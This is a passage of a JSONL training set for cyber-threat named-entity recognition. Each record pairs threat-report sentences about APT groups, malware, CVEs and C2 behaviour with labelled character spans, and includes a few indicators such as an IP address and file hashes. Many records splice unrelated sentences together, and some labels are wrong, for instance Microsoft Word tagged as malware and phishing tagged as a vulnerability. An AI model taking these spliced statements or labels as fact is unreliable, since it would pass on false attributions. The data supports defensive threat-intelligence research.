Cl0p": [[864, 868]], "ORGANIZATION: several federal agencies": [[875, 899]], "THREAT_ACTOR: the gang": [[925, 933]]}, "info": {"id": "cyberner_stix_train_000784", "source": "cyberner_stix_train"}}
{"text": "PLATINUM 's approach toward exploiting vulnerabilities varies between campaigns . Only one incident involving a Russian bank was promptly identified and prevented that is known to Group-IB .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "ORGANIZATION: bank": [[120, 124]], "ORGANIZATION: Group-IB": [[180, 188]]}, "info": {"id": "cyberner_stix_train_000785", "source": "cyberner_stix_train"}}
{"text": "The Backdoor : System malware ( mcpef.apk and brother.apk ) This tries a few persistence methods by using few anti-uninstall techniques ( described below ) and downloads and executes code from server without user consent . PittyTiger has also been seen using Heartbleed vulnerability in order to directly get valid credentials . Since exposure of its operations in 2013 , APT10 has made a number of significant changes intended to thwart detection of its campaigns .", "spans": {"THREAT_ACTOR: PittyTiger": [[223, 233]], "VULNERABILITY: Heartbleed vulnerability": [[259, 283]], "THREAT_ACTOR: APT10": [[372, 377]]}, "info": {"id": "cyberner_stix_train_000786", "source": "cyberner_stix_train"}}
{"text": "LEAD and BARIUM are not known for large-scale spear-phishing , so it is unlikely that SOC personnel would have to deal with multiple machines having been compromised by these groups at the same time .", "spans": {"THREAT_ACTOR: LEAD": [[0, 4]], "THREAT_ACTOR: BARIUM": [[9, 15]]}, "info": {"id": "cyberner_stix_train_000787", "source": "cyberner_stix_train"}}
{"text": "While tracking APT28 , we noted the group ’s interest in foreign governments and militaries , particularly those of European and Eastern European nations , as well as regional security organizations , such as the North Atlantic Treaty Organization ( NATO ) and the Organization for Security and Cooperation in Europe ( OSCE ) , among others .", "spans": {"THREAT_ACTOR: APT28": [[15, 20]], "ORGANIZATION: North Atlantic Treaty Organization": [[213, 247]], "ORGANIZATION: NATO": [[250, 254]], "ORGANIZATION: Organization for Security and Cooperation in Europe": [[265, 316]], "ORGANIZATION: OSCE": [[319, 323]]}, "info": {"id": "cyberner_stix_train_000788", "source": "cyberner_stix_train"}}
{"text": "To improve coverage while minimizing false positives , Windows Defender ATP uses the intelligent security graph to differentiate between suspicious and benign behavior before generating alerts .", "spans": {"TOOL: Windows Defender ATP": [[55, 75]]}, "info": {"id": "cyberner_stix_train_000789", "source": "cyberner_stix_train"}}
{"text": "But rather than trying to pursue some comparison between the two for identification of superiority ( an approach that will result in unproductive argument and social media warring ) , the point of this post is to highlight the distinctions between these approaches and how – in the case of “ the TRITON actor ” – they result in noticeably different conclusions from similar datasets .", "spans": {"MALWARE: TRITON": [[296, 302]]}, "info": {"id": "cyberner_stix_train_000790", "source": "cyberner_stix_train"}}
{"text": "This feature was enabled only in newer versions of TrickMo that were tailored specifically for German banks and use a special application for implementing TAN-based 2FA . The malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server . the group 's targets include an embassy in Belgium .", "spans": {"MALWARE: TrickMo": [[51, 58]], "TOOL: PowerShell script": [[258, 275]], "ORGANIZATION: embassy": [[359, 366]]}, "info": {"id": "cyberner_stix_train_000791", "source": "cyberner_stix_train"}}
{"text": "Stolen Data Figure 8 : Sending data to the attacker . The most recent sample of Bemstour seen by Symantec appears to have been compiled on March 23 , 2019 , eleven days after the zero-day vulnerability was patched by Microsoft . Threat Group-1314 : TG-1314 .", "spans": {"MALWARE: Bemstour": [[80, 88]], "ORGANIZATION: Symantec": [[97, 105]], "THREAT_ACTOR: Threat Group-1314": [[229, 246]], "THREAT_ACTOR: TG-1314": [[249, 256]]}, "info": {"id": "cyberner_stix_train_000792", "source": "cyberner_stix_train"}}
{"text": "Discovered for the first time in Mexico back in 2013 , Ploutus enabled criminals to empty ATMs using either an external keyboard attached to the machine or via SMS message , a technique that had never been seen before . Several times , APT5 has targeted organizations and personnel based in Southeast Asia .", "spans": {"MALWARE: Ploutus": [[55, 62]], "THREAT_ACTOR: APT5": [[236, 240]], "ORGANIZATION: organizations": [[254, 267]], "ORGANIZATION: personnel": [[272, 281]]}, "info": {"id": "cyberner_stix_train_000793", "source": "cyberner_stix_train"}}
{"text": "CTU researchers have observed TG-3390 compromising a target organization's externally and internally accessible assets , such as an OWA server , and adding redirect code to point internal users to an external website that hosts an exploit and delivers malware .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: TG-3390": [[30, 37]], "TOOL: OWA": [[132, 135]]}, "info": {"id": "cyberner_stix_train_000794", "source": "cyberner_stix_train"}}
{"text": "Commands Arguments SCREENSHOT None SYS_INFO None GET_NETWORK None SCAN_ALL None .", "spans": {}, "info": {"id": "cyberner_stix_train_000795", "source": "cyberner_stix_train"}}
{"text": "Interestingly , \" mundizza '' is typical of Calabria , a region in the south of Italy , and more specifically it appears to be language native of the city of Catanzaro . TA549 possesses a diverse malware arsenal including PlugX , NetTraveler , and ZeroT . The macro code does the following : COSMICENERGY Possibly Associated With Russian Government - Funded Power Disruption and Emergency Response Exercises During our analysis of COSMICENERGY , we identified a comment in the code that indicated the sample uses a module associated with a project named “ Solar Polygon ” ( Figure 2 ) .", "spans": {"THREAT_ACTOR: TA549": [[170, 175]], "TOOL: PlugX": [[222, 227]], "TOOL: NetTraveler": [[230, 241]], "TOOL: ZeroT": [[248, 253]], "MALWARE: COSMICENERGY": [[292, 304], [431, 443]], "ORGANIZATION: Russian Government": [[330, 348]]}, "info": {"id": "cyberner_stix_train_000796", "source": "cyberner_stix_train"}}
{"text": "Executing the modified applications obtained this way would result in the victim being infected with unidentified malware .", "spans": {}, "info": {"id": "cyberner_stix_train_000797", "source": "cyberner_stix_train"}}
{"text": "The group's primary and likely proprietary RCSession RAT communicates with a hard-coded C2 server using a custom protocol over TCP port 443 .", "spans": {"MALWARE: RCSession": [[43, 52]], "TOOL: C2": [[88, 90]]}, "info": {"id": "cyberner_stix_train_000798", "source": "cyberner_stix_train"}}
{"text": "] 205 [ . For these CozyDuke campaigns however , the Dukes appear to have employed two particular later-stage toolsets , SeaDuke and HammerDuke . In the variants that were obtained during this campaign the file contained a PowerShell script that was approximately 2800 lines . The popularity of social network and media platforms remain on the rise , and we expect cybercriminals to be naturally drawn towards exploiting them however they can .", "spans": {"THREAT_ACTOR: Dukes": [[53, 58]], "TOOL: SeaDuke": [[121, 128]], "TOOL: HammerDuke": [[133, 143]], "TOOL: PowerShell": [[223, 233]], "TOOL: social network and media platforms": [[295, 329]], "THREAT_ACTOR: cybercriminals": [[365, 379]]}, "info": {"id": "cyberner_stix_train_000799", "source": "cyberner_stix_train"}}
{"text": "‘ One-time ’ domains also appeared with names made up of random strings of characters and numbers , combined with the top-level domains .cf , .ga , .gq , .ml , or .tk . The HTA files contained job descriptions and links to job postings on popular employment websites . The WannaCry malware consists of two distinct components , one that provides ransomware functionality and a component used for propagation , which contains functionality to enable SMB exploitation capabilities .", "spans": {"MALWARE: HTA files": [[173, 182]], "MALWARE: WannaCry": [[273, 281]], "MALWARE: malware": [[282, 289]], "MALWARE: SMB": [[449, 452]]}, "info": {"id": "cyberner_stix_train_000800", "source": "cyberner_stix_train"}}
{"text": "UNITEDRAKE is described as a \" fully extensible \" data collection tool that is specifically developed for Windows machines to allow operators the chance of controlling a device completely . After reviewing all the malware functionalities , we are confident in saying that the attackers look for victims who answer well-defined characteristics and believe that further stages of the attack are delivered only to those who fit the specific victim profile .", "spans": {"TOOL: UNITEDRAKE": [[0, 10]], "THREAT_ACTOR: attackers": [[276, 285]], "ORGANIZATION: victims who answer": [[295, 313]]}, "info": {"id": "cyberner_stix_train_000801", "source": "cyberner_stix_train"}}
{"text": "Flash Player com.mwmnfwt.arhkrgajn ffa5ac3460998e7b9856fc136ebcd112196c3abf24816ccab1fbae11eae4954c Flash Player com.wogdjywtwq.oiofvpzpxyo 6ac7e7ed83b4b57cc4d28f14308d69d062d29a544bbde0856d5697b0fc50cde4 Flash Player com.hvdnaiujzwo.fovzeukzywfr Until 2019 , SectorJ04 group had carried out massive website-based hacking activities that mainly utilize ransomware and banking trojans for financial profit , and has also been carrying out information gathering activities to secure attack resources such as email accounts and system login information from users since 2019 . Symantec discovered the most recent wave of Tick attacks in July 2015 , when the group compromised three different Japanese websites with a Flash ( .swf ) exploit to mount watering hole attacks .", "spans": {"SYSTEM: Flash Player": [[0, 12], [100, 112], [205, 217]], "THREAT_ACTOR: SectorJ04": [[260, 269]], "TOOL: ransomware": [[353, 363]], "TOOL: banking trojans": [[368, 383]], "ORGANIZATION: Symantec": [[574, 582]]}, "info": {"id": "cyberner_stix_train_000802", "source": "cyberner_stix_train"}}
{"text": "Our investigation shines a light on an often unknown and seedier secret life of code-signing certificates , which is completely unknown to their owners .", "spans": {}, "info": {"id": "cyberner_stix_train_000803", "source": "cyberner_stix_train"}}
{"text": "• Change server domain Out of these , the most interesting command is the “ install app ” command that downloads an encrypted zip file containing the second phase dex file , unpacks and loads it . We identified APT33 malware tied to an Iranian persona who may have been employed by the Iranian government to conduct cyber threat activity against its adversaries . Like mentioned in modules file names the malware consists of several working threads dedicated to different tasks, including C2 command parsing and data . Among the IP addresses owned by Hack520 is a whole/22 IP Range which we dubbed as the “ PIG RANGE ” .", "spans": {"TOOL: APT33 malware": [[211, 224]], "TOOL: C2": [[489, 491]], "THREAT_ACTOR: Hack520": [[551, 558]]}, "info": {"id": "cyberner_stix_train_000804", "source": "cyberner_stix_train"}}
{"text": "Figure 14 : Information theft via fake credit card verification using stolen branding Figure 15 : Information theft via fake credit card verification using stolen branding Some of the campaigns appear to have a wider reach based on bit.ly statistics like this one from October 13 , 2017 : Figure 16 : bit.ly statistics for an October 13 , 2017 campaign Over several days during the last three months , Proofpoint researchers observed campaigns using similar techniques targeting the banking customers of Raffeisen and Sparkasse . Once in Frankfurt CIA hackers can travel without further border checks to the 25 European countries that are part of the Shengen open border area — including France , Italy and Switzerland . This group is also known as Shell Crew , WebMasters , KungFu Kittens , and PinkPanther .", "spans": {"ORGANIZATION: Proofpoint": [[402, 412]], "THREAT_ACTOR: CIA": [[548, 551]], "THREAT_ACTOR: Shell Crew": [[749, 759]], "THREAT_ACTOR: WebMasters": [[762, 772]], "THREAT_ACTOR: KungFu Kittens": [[775, 789]], "THREAT_ACTOR: PinkPanther": [[796, 807]]}, "info": {"id": "cyberner_stix_train_000805", "source": "cyberner_stix_train"}}
{"text": "APT28 continues to evolve its toolkit and refine its tactics in what is almost certainly an effort to protect its operational effectiveness in the face of heightened public exposure and scrutiny .", "spans": {"THREAT_ACTOR: APT28": [[0, 5]]}, "info": {"id": "cyberner_stix_train_000806", "source": "cyberner_stix_train"}}
{"text": "Figure 14 . The threat actors used two publicly available techniques , an AppLocker whitelisting bypass and a script to inject shellcode into the userinit.exe process . This attack resembles previous attacks by HIDDEN COBRA conducted against the SWIFT .", "spans": {"THREAT_ACTOR: actors": [[23, 29]], "MALWARE: userinit.exe": [[146, 158]], "THREAT_ACTOR: HIDDEN COBRA": [[211, 223]]}, "info": {"id": "cyberner_stix_train_000807", "source": "cyberner_stix_train"}}
{"text": "The attack was detected as part of a spear phishing against a government organization in Europe in late May 2016 . Trochilus was first reported by Arbor Networks in their Seven Pointed Dagger report tying its use to other targeted Southeast Asia activity .", "spans": {"ORGANIZATION: government organization": [[62, 85]], "MALWARE: Trochilus": [[115, 124]], "ORGANIZATION: Arbor Networks": [[147, 161]]}, "info": {"id": "cyberner_stix_train_000808", "source": "cyberner_stix_train"}}
{"text": "ORat acts as a flexible loader tool rather than a fully featured remote access tool .", "spans": {"MALWARE: ORat": [[0, 4]]}, "info": {"id": "cyberner_stix_train_000809", "source": "cyberner_stix_train"}}
{"text": "He is responsible for developing tools for conducting attacks and is also able to modify complex exploits and third party software . Once an exploitable page is identified , Clever Kitten will attempt to upload a PHP backdoor to gain remote access to the system .", "spans": {}, "info": {"id": "cyberner_stix_train_000810", "source": "cyberner_stix_train"}}
{"text": "Like Dridex , Locky is also distributed in an affiliate model ; TA505 exclusively distributes Locky Affid=3 .", "spans": {"MALWARE: Dridex": [[5, 11]], "MALWARE: Locky": [[14, 19], [94, 99]], "THREAT_ACTOR: TA505": [[64, 69]]}, "info": {"id": "cyberner_stix_train_000811", "source": "cyberner_stix_train"}}
{"text": "] 99 [ . Our visibility into the operations of APT28 - a group we believe the Russian Government sponsors - has given us insight into some of the government 's targets , as well as its objectives and the activities designed to further them . The send counter is used to track the number of chunks sent to the . Given Sandworm ’s global threat activity and novel OT capabilties , we urge OT asset owners to take action to mitigate this threat .", "spans": {"THREAT_ACTOR: APT28": [[47, 52]], "THREAT_ACTOR: group": [[57, 62]], "ORGANIZATION: government": [[146, 156]], "ORGANIZATION: OT": [[387, 389]]}, "info": {"id": "cyberner_stix_train_000812", "source": "cyberner_stix_train"}}
{"text": "Here is a list of their similarities .", "spans": {}, "info": {"id": "cyberner_stix_train_000813", "source": "cyberner_stix_train"}}
{"text": "BLOCKER_UPDATE_START – display fake HTML page for update . Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 . Another intrusion approach used by Leafminer seems a lot less sophisticated than the previously described methods but can be just as effective : using specific hacktools to guess the login passwords for services exposed by a targeted system .", "spans": {"MALWARE: malicious.DOC": [[145, 158]], "VULNERABILITY: Microsoft Common Controls vulnerability": [[178, 217]], "VULNERABILITY: CVE-2012-0158": [[220, 233]], "THREAT_ACTOR: Leafminer": [[271, 280]], "MALWARE: hacktools": [[396, 405]]}, "info": {"id": "cyberner_stix_train_000814", "source": "cyberner_stix_train"}}
{"text": "The following shows this unused command , which exposed an additional server within Sofacy ’s infrastructure would download and execute an encoded PowerShell script from 92.114.92.102 .", "spans": {"THREAT_ACTOR: Sofacy": [[84, 90]], "TOOL: PowerShell": [[147, 157]], "IP_ADDRESS: 92.114.92.102": [[170, 183]]}, "info": {"id": "cyberner_stix_train_000815", "source": "cyberner_stix_train"}}
{"text": "The only known infection vector for SeaDuke is via an existing CozyDuke infection , wherein CozyDuke downloads and executes the SeaDuke toolset .", "spans": {"MALWARE: SeaDuke": [[36, 43], [128, 135]], "MALWARE: CozyDuke": [[63, 71], [92, 100]]}, "info": {"id": "cyberner_stix_train_000816", "source": "cyberner_stix_train"}}
{"text": "The activities continue : the most recently observed domain was registered on October 31 , 2017 . Based on our analysis , we can confirm that MuddyWater target Turkish government organizations related to the finance and energy sectors . Cobalt Group is a financially motivated threat group that has primarily targeted financial institutions .", "spans": {"THREAT_ACTOR: MuddyWater": [[142, 152]], "ORGANIZATION: Turkish government organizations": [[160, 192]], "ORGANIZATION: finance": [[208, 215]], "ORGANIZATION: energy": [[220, 226]], "THREAT_ACTOR: Cobalt Group": [[237, 249]]}, "info": {"id": "cyberner_stix_train_000817", "source": "cyberner_stix_train"}}
{"text": "It seems that the main objective of the attackers was information gathering from the infected computers . The document , when opened , used an embedded ActiveX control to download a JavaScript file from a remote site that used a previously unknown vulnerability in some versions of Windows ( later designated CVE-2013-7331 ) to read information about the browser 's installed components .", "spans": {"MALWARE: ActiveX control": [[152, 167]], "FILEPATH: JavaScript file": [[182, 197]], "SYSTEM: Windows": [[282, 289]], "VULNERABILITY: CVE-2013-7331": [[309, 322]]}, "info": {"id": "cyberner_stix_train_000818", "source": "cyberner_stix_train"}}
{"text": "The document files exploit at least three known vulnerabilities in Microsoft Office , which we discuss in the Infection Techniques section . In fact , REDBALDKNIGHT has been targeting Japan as early as 2008 , based on the file properties of the decoy documents they've been sending to their targets .", "spans": {"MALWARE: document files": [[4, 18]], "VULNERABILITY: vulnerabilities": [[48, 63]], "THREAT_ACTOR: REDBALDKNIGHT": [[151, 164]], "FILEPATH: decoy documents": [[245, 260]]}, "info": {"id": "cyberner_stix_train_000819", "source": "cyberner_stix_train"}}
{"text": "The overall process to result in a successful exploitation is :", "spans": {}, "info": {"id": "cyberner_stix_train_000820", "source": "cyberner_stix_train"}}
{"text": "They have been well documented and well researched with much of their attack methodologies exposed .", "spans": {}, "info": {"id": "cyberner_stix_train_000821", "source": "cyberner_stix_train"}}
{"text": "While much of the industry focuses on the threats of hardware implants , we can see in this example that adversaries are happy to exploit simpler configuration and security issues to achieve their objectives .", "spans": {}, "info": {"id": "cyberner_stix_train_000822", "source": "cyberner_stix_train"}}
{"text": "They seem to have specialized knowledge about military operations , as they are focused on stealing specific files such as those that describe navigation routes . Longhorn , which we internally refer to as \" The Lamberts \" , first came to the attention of the ITSec community in 2014 , when our colleagues from FireEye discovered an attack using a zero day vulnerability ( CVE-2014-4148 ) .", "spans": {"THREAT_ACTOR: They": [[0, 4]], "ORGANIZATION: military": [[46, 54]], "THREAT_ACTOR: The Lamberts": [[208, 220]], "ORGANIZATION: ITSec community": [[260, 275]], "ORGANIZATION: FireEye": [[311, 318]], "VULNERABILITY: zero day": [[348, 356]], "VULNERABILITY: vulnerability": [[357, 370]], "VULNERABILITY: CVE-2014-4148": [[373, 386]]}, "info": {"id": "cyberner_stix_train_000823", "source": "cyberner_stix_train"}}
{"text": "The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell . In a more recent version of the modified Gh0st RAT malware , Ghost Dragon implemented dynamic packet flags which change the first five bytes of the header in every login request with the controller .", "spans": {"TOOL: python script": [[63, 76]], "VULNERABILITY: CVE-2017-0144": [[132, 145]], "MALWARE: errr.aspx": [[194, 203]], "FILEPATH: Gh0st RAT": [[256, 265]], "THREAT_ACTOR: Ghost Dragon": [[276, 288]]}, "info": {"id": "cyberner_stix_train_000824", "source": "cyberner_stix_train"}}
{"text": "Command & Controls ad1.fbsba [ . Based on information gained from discussion with the initial TRITON/TRISIS responders and subsequent work on follow-on activity by this entity , Dragos developed a comprehensive ( public ) picture of adversary activity roughly matching FireEye 's analysis published in April 2019 , described in various media . campaign targets Palestinian individuals and entities in the Middle East , specifically directed at We searched for the unique string and identified a single match to a cyber range ( aka polygon ) developed by Rostelecom - Solar , a Russian cyber security company that received a government in 2019 to begin training cyber security experts and conducting electric power disruption and emergency response exercises .", "spans": {"TOOL: TRITON/TRISIS": [[94, 107]], "ORGANIZATION: Dragos": [[178, 184]], "ORGANIZATION: FireEye": [[269, 276]], "ORGANIZATION: media": [[336, 341]], "ORGANIZATION: cyber range": [[513, 524]], "ORGANIZATION: aka polygon": [[527, 538]], "ORGANIZATION: Rostelecom - Solar": [[554, 572]], "ORGANIZATION: Russian cyber security company": [[577, 607]]}, "info": {"id": "cyberner_stix_train_000825", "source": "cyberner_stix_train"}}
{"text": "The persistent use of social media to identify and manipulate victims indicates that COBALT GYPSY successfully achieves its objectives using this tactic . The JavaScript forces visiting web browsers to collect and send (via a POST request) web browser , browser version , country of origin , and IP address data to the attacker controlled server jquerycodedownload.live/check.aspx” .", "spans": {"ORGANIZATION: social media": [[22, 34]], "THREAT_ACTOR: COBALT GYPSY": [[85, 97]], "FILEPATH: JavaScript": [[159, 169]]}, "info": {"id": "cyberner_stix_train_000826", "source": "cyberner_stix_train"}}
{"text": "The malware known as Tafacalou ( aka \" TFC \" , \" Transporter \" ) is perhaps of greatest interest here , because it acts as an entry point for the more sophisticated spy platforms Babar and Dino . From 2013 Carbanak intensified its activity focused on banks and electronic payment systems in Russia and in the post-Soviet space .", "spans": {"TOOL: Tafacalou": [[21, 30]], "TOOL: TFC": [[39, 42]], "TOOL: Transporter": [[49, 60]], "TOOL: Babar": [[179, 184]], "TOOL: Dino": [[189, 193]], "MALWARE: Carbanak": [[206, 214]], "ORGANIZATION: banks": [[251, 256]], "ORGANIZATION: electronic payment": [[261, 279]], "ORGANIZATION: space": [[321, 326]]}, "info": {"id": "cyberner_stix_train_000827", "source": "cyberner_stix_train"}}
{"text": "In recent years , online activity has gradually been shifting from personal computers to mobile devices . Despite being an older vulnerability , many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word . It is highly likely that this is due to the release of the 2013 FireEye report .", "spans": {"VULNERABILITY: CVE-2012-0158": [[185, 198]], "MALWARE: Microsoft Word": [[210, 224]], "ORGANIZATION: FireEye": [[291, 298]]}, "info": {"id": "cyberner_stix_train_000828", "source": "cyberner_stix_train"}}
{"text": "It contains two tables – ‘ supported_devices ’ and ‘ device_address ’ . these threat actors targeted a number of government agencies Threat actors targeted a number of government agencies in East Asia . Operation Soft Cell is a group that is reportedly affiliated with China and is likely state-sponsored .", "spans": {"THREAT_ACTOR: Threat actors": [[133, 146]], "ORGANIZATION: government": [[168, 178]], "ORGANIZATION: agencies": [[179, 187]], "THREAT_ACTOR: Soft Cell": [[213, 222]]}, "info": {"id": "cyberner_stix_train_000829", "source": "cyberner_stix_train"}}
{"text": "The function onUserLeaveHint ( ) is called whenever the malware screen is pushed to background , causing the in-call Activity to be automatically brought to the foreground . As the crisis in Syria escalates , FireEye researchers have discovered a cyber espionage campaign , which we call \" Ke3chang \" , that falsely advertises information updates about the ongoing crisis to compromise MFA networks in Europe . . The campaign started in at least June 2023 , and the ransom note appears to mimic certain aspects of the ransom note used in the global WannaCry attacks from 2017 .", "spans": {"ORGANIZATION: FireEye": [[209, 216]], "THREAT_ACTOR: Ke3chang": [[290, 298]]}, "info": {"id": "cyberner_stix_train_000830", "source": "cyberner_stix_train"}}
{"text": "Enabling the “ Toggle Field Codes ” feature reveals the DDE instructions to us and shows that the author had set instructions to size 1 font and with a white coloring .", "spans": {}, "info": {"id": "cyberner_stix_train_000831", "source": "cyberner_stix_train"}}
{"text": "Allows an application to initiate a phone call without going through the Dialer user interface for the user to confirm the call . After infestation , Weeping Angel places the target TV in a 'Fake-Off' mode , so that the owner falsely believes the TV is off when it is on . FIN7 is a financially-motivated threat group that has primarily targeted the U.S. retail , restaurant , and hospitality sectors since mid-2015 .", "spans": {"THREAT_ACTOR: Weeping Angel": [[150, 163]], "THREAT_ACTOR: FIN7": [[273, 277]]}, "info": {"id": "cyberner_stix_train_000832", "source": "cyberner_stix_train"}}
{"text": "The SpyNote RAT registers a service called AutoStartup and a broadcast receiver named BootComplete . The Silence.Main Trojan , which is the main stage of the attack , has a full set of commands to control a compromised computer . TinyZBot is a bot written in C# and developed by the Cleaver team .", "spans": {"MALWARE: SpyNote RAT": [[4, 15]], "MALWARE: Silence.Main Trojan": [[105, 124]], "MALWARE: TinyZBot": [[230, 238]], "TOOL: C#": [[259, 261]], "THREAT_ACTOR: Cleaver": [[283, 290]]}, "info": {"id": "cyberner_stix_train_000833", "source": "cyberner_stix_train"}}
{"text": "In total , Scattered Canary received more than 3 , 000 account credentials as a result of their phishing attacks . A significantly improved variant of the Bemstour exploit tool was rolled out in September 2016 , when it was used in an attack against an educational institution in Hong Kong .", "spans": {"THREAT_ACTOR: Scattered Canary": [[11, 27]], "VULNERABILITY: phishing": [[96, 104]], "FILEPATH: Bemstour": [[155, 163]], "VULNERABILITY: exploit": [[164, 171]]}, "info": {"id": "cyberner_stix_train_000834", "source": "cyberner_stix_train"}}
{"text": "This one-line powershell command , stored only in WMI database , establishes an encrypted connection to C2 and downloads additional powershell modules from it , executing them in memory .", "spans": {"TOOL: powershell": [[14, 24], [132, 142]], "TOOL: WMI": [[50, 53]], "TOOL: C2": [[104, 106]]}, "info": {"id": "cyberner_stix_train_000835", "source": "cyberner_stix_train"}}
{"text": "Kyrgyzstan Ministry of Foreign Affairs :", "spans": {"ORGANIZATION: Kyrgyzstan Ministry of Foreign Affairs": [[0, 38]]}, "info": {"id": "cyberner_stix_train_000836", "source": "cyberner_stix_train"}}
{"text": "In these cases , CozyDuke was instructed by its C&C server to download and execute OnionDuke toolset .", "spans": {"MALWARE: CozyDuke": [[17, 25]], "TOOL: C&C": [[48, 51]], "MALWARE: OnionDuke": [[83, 92]]}, "info": {"id": "cyberner_stix_train_000837", "source": "cyberner_stix_train"}}
{"text": "After it is launched , GolfSpy will generate a unique ID for the affected device and then collect its data such as SMS , contact list , location , and accounts in this format : “ % , [ ] , time ” ( shown in Figure 4 ) . The ScarCruft group uses common malware delivery techniques such as spear phishing and Strategic Web Compromises ( SWC ) . Moreover , the builder allows these to modify different IOCs , such as the filenames of wscript.exe or sctasks.exe copies , etc . This is when threat actors create a suite of malware tools and offer them up for sale on illicit websites .", "spans": {"MALWARE: GolfSpy": [[23, 30]], "THREAT_ACTOR: ScarCruft group": [[224, 239]], "TOOL: SWC": [[335, 338]], "TOOL: IOCs": [[399, 403]], "FILEPATH: wscript.exe": [[431, 442]], "FILEPATH: sctasks.exe": [[446, 457]], "THREAT_ACTOR: threat actors": [[486, 499]], "TOOL: a suite of malware tools": [[507, 531]]}, "info": {"id": "cyberner_stix_train_000838", "source": "cyberner_stix_train"}}
{"text": "Given previous operational security errors from this actor in the past which resulted in exfiltrated content being publicly accessible Lookout Threat Intelligence is continuing to map out infrastructure and closely monitor their continued evolution . We believe Lazarus started this watering hole attack at the end of 2016 after their other operation was interrupted in South East Asia . If successfully exploited on an unpatched computer , the vulnerability could permit an attacker to install any file on the computer , which effectively permits code execution on the targeted computer . This gave them the ability to launch an unprecedented number of attacks within a short time frame and across a massive scale .", "spans": {"ORGANIZATION: Lookout Threat Intelligence": [[135, 162]], "THREAT_ACTOR: Lazarus": [[262, 269]]}, "info": {"id": "cyberner_stix_train_000839", "source": "cyberner_stix_train"}}
{"text": "This gives JavaScript run in the WebView access to this method . Bahamut was shown to be resourceful , not only maintaining their own Android malware but running propaganda sites , although the quality of these activities varied noticeably . This simply deletes the ZxShell service key from the Windows registry ( using SHDeleteKey Api ) and all of the subkeys . The second , CVE-2022 - 41080 , has not been publicly detailed but its CVSS score of 8.8 is the same as CVE-2022 - 41040 used in the ProxyNotShell exploit chain , and it has been marked “ exploitation more likely . ”", "spans": {"THREAT_ACTOR: Bahamut": [[65, 72]], "TOOL: Android malware": [[134, 149]], "MALWARE: ZxShell": [[266, 273]], "SYSTEM: Windows": [[295, 302]], "VULNERABILITY: CVE-2022 - 41080": [[376, 392]], "VULNERABILITY: CVE-2022 - 41040": [[467, 483]]}, "info": {"id": "cyberner_stix_train_000840", "source": "cyberner_stix_train"}}
{"text": "After landing on the victim ’ s phone , the RuMMS apps will request device administrator privileges , remove their icons to hide themselves from users , and remain running in the background to perform a series of malicious behaviors . In May 2016 , two apparently unrelated activity groups , PROMETHIUM and NEODYMIUM , conducted attack campaigns in Europe that used the same zeroday exploit while the vulnerability was publicly unknown . Ssdeep : 768:5KCB8tnh7oferuHpC0xw+hnF4J7EyKfJ : oI8XoWruHpp/P4 . COSMICENERGY accomplishes this via its two derivative components , which we track as PIEHOP and LIGHTWORK ( see appendices for technical analyses ) .", "spans": {"MALWARE: RuMMS": [[44, 49]], "THREAT_ACTOR: activity groups": [[274, 289]], "THREAT_ACTOR: PROMETHIUM": [[292, 302]], "THREAT_ACTOR: NEODYMIUM": [[307, 316]], "VULNERABILITY: zeroday exploit": [[375, 390]], "TOOL: Ssdeep": [[438, 444]], "MALWARE: COSMICENERGY": [[503, 515]], "MALWARE: PIEHOP": [[588, 594]], "MALWARE: LIGHTWORK": [[599, 608]]}, "info": {"id": "cyberner_stix_train_000841", "source": "cyberner_stix_train"}}
{"text": "Exfiltrated device information and additional sensitive data sent to the C2 server . The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell . The Ke3chang attackers have been active since at least 2010 .", "spans": {"TOOL: python script": [[148, 161]], "VULNERABILITY: CVE-2017-0144": [[217, 230]], "MALWARE: errr.aspx": [[279, 288]], "THREAT_ACTOR: Ke3chang": [[304, 312]], "THREAT_ACTOR: attackers": [[313, 322]]}, "info": {"id": "cyberner_stix_train_000842", "source": "cyberner_stix_train"}}
{"text": "A commonly observed element of implants from VOODOO BEAR — at least until this information was made public in late 2014 — were references in the malware to the 1965 science fiction novel Dune , by Frank Herbert . The threat actor’s emails usually contain a picture or a link without a malicious payload and are sent out to a huge recipient database of up to 85 , 000 users .", "spans": {"THREAT_ACTOR: VOODOO BEAR": [[45, 56]], "THREAT_ACTOR: actor’s": [[224, 231]], "TOOL: emails": [[232, 238]], "FILEPATH: malicious payload": [[285, 302]], "ORGANIZATION: users": [[367, 372]]}, "info": {"id": "cyberner_stix_train_000843", "source": "cyberner_stix_train"}}
{"text": "READ_CONTACTS - Allows the application to read the user 's contacts data . The Carbanak group , which has a long track record of compromising infrastructure belonging to financial institutions , is still active . Additionally , during that time , members of Gorgon Group were also performing criminal operations against targets across the globe , often using shared infrastructure with their targeted attack operations .", "spans": {"THREAT_ACTOR: Carbanak": [[79, 87]], "ORGANIZATION: financial": [[170, 179]], "THREAT_ACTOR: Gorgon Group": [[258, 270]], "MALWARE: shared infrastructure": [[359, 380]]}, "info": {"id": "cyberner_stix_train_000844", "source": "cyberner_stix_train"}}
{"text": "This screen persists on the screen and prevents the user from using the navigation buttons . The group 's primary goal is demonstrating to companies that they have weak security . Remsec uses a Lua interpreter to run Lua modules which perform various functions .", "spans": {"MALWARE: Remsec": [[180, 186]], "MALWARE: Lua interpreter": [[194, 209]], "MALWARE: Lua modules": [[217, 228]]}, "info": {"id": "cyberner_stix_train_000845", "source": "cyberner_stix_train"}}
